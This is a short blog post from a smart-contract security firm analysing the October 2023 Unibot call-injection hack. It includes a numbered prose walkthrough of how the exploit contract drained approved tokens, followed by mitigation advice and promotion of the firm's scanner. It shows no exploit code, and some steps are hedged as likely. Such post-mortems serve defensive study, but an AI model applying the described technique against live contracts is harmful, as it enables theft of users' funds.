SolidityScan
HACK ANALYSIS 3 min read

Unibot Hack Analysis

Unibot Hack Analysis

Overview:

On 31st Oct, 2023 Unibot was hacked due to a call injection attack, leading to a total loss of 500k$.

Smart Contract Hack Overview:

Decoding the Smart Contract Vulnerability:

The root cause is a Call Injection. This vulnerability enabled attackers to inject their own malicious data into the 0xb2bd16ab() method, which subsequently allowed them to transfer tokens that were approved to Unibot contracts.

1. The attacker exploited the Unibot contract by obtaining excessively high token allowances for various addresses, surpassing their actual token balances.

2. The exploit contract systematically processes a list of addresses with elevated allowances (referred to as the ‘cd’ array).

– For each address, it examines the balance stored in ‘stor1’ within the Unibot contract.

– It also checks the allowance allocated within ‘stor1’ in the Unibot contract.

3. For each address in the list, it evaluates the Unibot balance through the ‘stor1.balanceOf()’ function and the allowance via ‘Unibot.allowance()’.

– When the allowance exceeds the balance, a callback to itself is initiated, passing along the address, the Unibot contract, balance, and allowance.

5. The self-triggered callback likely involves the execution of ‘transferFrom()’ with the excessively high allowance amount.

6. The crucial exploit lies in the self-callback:

– It relies on the inflated Unibot allowance to siphon off tokens.

– This circumvents the actual Unibot balances.

7. Consequently, the attacker successfully drains Unibot tokens from the contract into their own account, capitalizing on allowances surpassing the actual balances.

8. Replicating this process across multiple addresses with inflated allowances allows for the mass depletion of a significant total token amount.

Fig: The root cause of the vulnerability

Mitigation and Best Practices:

  • Users need to revoke approval for 0x126c9F.
  • Always validate your code by writing comprehensive test cases that cover all the possible business logic.
  • To prevent such vulnerabilities, the best Smart Contract auditors must examine the Smart Contracts for logical issues. We at CredShields provide smart contract security and end-to-end security of web applications and externally exposed networks. Schedule a call at https://credshields.com/
  • Scan your Solidity contracts against the latest common security vulnerabilities with 130+ detections at SolidityScan
Fig: SolidityScan — Smart Contract Vulnerability Scanner

Conclusion:

SolidityScan is an advanced smart contract scanning tool that discovers vulnerabilities and reduces risks in code. Request a security audit with us, and we will help you secure your smart contracts. Signup for a free trial at https://solidityscan.com/signup

Follow us on our Social Media for Web3 security-related updates.
SolidityScan — LinkedIn | Twitter | Telegram | Discord

Astrid Finance Hack Analysis
TrustPad Hack Analysis